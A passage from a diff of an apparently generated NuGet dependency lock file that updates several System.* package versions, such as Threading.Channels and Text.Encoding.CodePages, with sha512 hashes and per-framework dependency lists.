"sha512-or1DAn2dl2SjxPA4tuDG9RxTxeERdHIU7gUJjNf8WhT6D08ZsHbmSZpP2rKpgGOXHMhmXf3CTDNmfa4cSD2DtA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", 
"System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime", "id": "System.Runtime", "version": "4.3.1", "sha512": "sha512-Al69mPDfzdD+bKGK2HAfB+lNFOHFqnkqzNnUJmmvUe1/qEPK9M7EiTT4zuycKDPy7ev11xz8XVgJWKP0hm7NIA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], 
"net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Runtime.CompilerServices.Unsafe", "id": 
"System.Runtime.CompilerServices.Unsafe", "version": "6.0.0", "sha512": "sha512-1AVzAb5OxJNvJLnOADtexNmWgattm2XVOT3TjQTN7Dd4SqoSwai1CsN2fth42uQldJSQdz/sAec0+TzxBFgisw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Runtime.CompilerServices.Unsafe", "id": "System.Runtime.CompilerServices.Unsafe", "version": "6.1.0", "sha512": "sha512-iY0upfdQeiaCfoxT+m4XJyb0IJNk4B9TLQFanOCOrU9X5x1x2TjKx0OFbLmg1VG2dOyL5nHMn198SBQ91Yy1kQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.Handles", "id": 
"System.Runtime.Handles", "version": "4.3.0", "sha512": "sha512-CluvHdVUv54BvLTOCCyybugreDNk/rR8unMPruzXDtxSjvrQOU3M4R831/lQf4YI8VYp668FGQa/01E+Rq8PEQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", 
"Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "8.0.0", "sha512": "sha512-hvcXZ/IR+KXxY9lC9S2izw5/fGYoODJR2r9kQSvs5v/HUAnBRuYYZPJrHzaT0CeDRJzIm8BHJb1ZrwHQ59j3uQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Memory"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "9.0.0", "sha512": "sha512-Mbc5s1XBLje0N1idqILQUqWnG8RVj9p7uK110yxZXTzZq3CN7jaCFEySK52kA+dPYtByzcRtA/FUnK4o/sinSw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": 
["System.Memory"], "net6.0": ["System.Memory"], "net7.0": ["System.Memory"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Security.Principal", "id": "System.Security.Principal", "version": "4.3.0", "sha512": "sha512-24oe0NGJY32e+DFHVQzl2okM9uwYmn0Aa6nehqtVZ55/Al4Yva7S3BN934Kn5qATH7TVTUJkgxhisdfF7mKDfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": ["System.Runtime"], "netstandard1.1": ["System.Runtime"], "netstandard1.2": ["System.Runtime"], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Text.Encoding", "id": 
"System.Text.Encoding", "version": "4.3.0", "sha512": "sha512-b/f+7HMTpxIfeV7H03bkuHKMFylCGfr9/U6gePnfFFW0aF8LOWLDgQCY6V1oWUqDksC3mdNuyChM1vy9TP4sZw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": 
["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Text.Encoding.CodePages", "id": "System.Text.Encoding.CodePages", "version": "7.0.0", "sha512": "sha512-SFq/rrH52sMHJJsthDdafWPEuxdRCRB7pZ46trR2xSpi1nfKPAbw6amZr9W/LyHTlqS01TRWO7najRuO1vxFig==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], 
"netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "7.0.0", "sha512": "sha512-XXmpdJbyVCagWg3bGfUGNTxKp4EK/3C4Bt8pXhKVYZKwHPjeHPOg0u2wdqHFsojU4u4i9KByAJTyzqLCMqwpUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Text.Encoding.CodePages", "id": "System.Text.Encoding.CodePages", "version": "9.0.0", "sha512": "sha512-rMAcE2cpS8RvPR5iK6WkYdZKJLsUw5BRqG3d/LR0dl8x17ezOj43AWRhp4LRIFgydWjOOn/Z4w//l8wcowngvQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], 
"net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "9.0.0", "sha512": "sha512-6q+SC/qL5eeX9t3zUjmtsccStVusUvYXdJFYGf3ihM/8TionV+iZxi3mxDPPFXOiepRe7WgrIOuoaCi4+bwZ0g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], 
"net46": [], "net461": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.Tasks", "id": "System.Threading.Tasks", "version": "4.3.0", "sha512": "sha512-fUiP+CyyCjs872OA8trl6p97qma/da1xGq3h4zAbJZk8zyaU4zyEfqW5vbkP80xG/Nimun1vlWBboMEk7XxdEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", 
"System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.5.4", "sha512": 
"sha512-aAUghud9PHGYc3o9oWPWd0C3xE+TJQw5ZZs78htlR6mr9ky/QEgfXHjyQ2GvOq9H1S0YizcVVKCSin92ZcH8FA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.2": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.3": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.4": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.5": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.6": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard2.0": 
["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.6.0", "sha512": "sha512-ph8eP2gKhA6mNhj/teYwn9xCrHMc7+nBMlSMKX7BUXcZn33RVLe45TWABkcgyS6TJWYx1v1WwtylHmF3Fvg0qQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.ThreadPool", "id": "System.Threading.ThreadPool", "version": "4.3.0", "sha512": "sha512-RQpA+UpI6Tlpeedk5JStYk2DM/M3i5HqabI/yDbfj1xDu9bIz9kdoquVpHbh/wQjOJaOCbcgRH8iQcAUv8dRWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], 
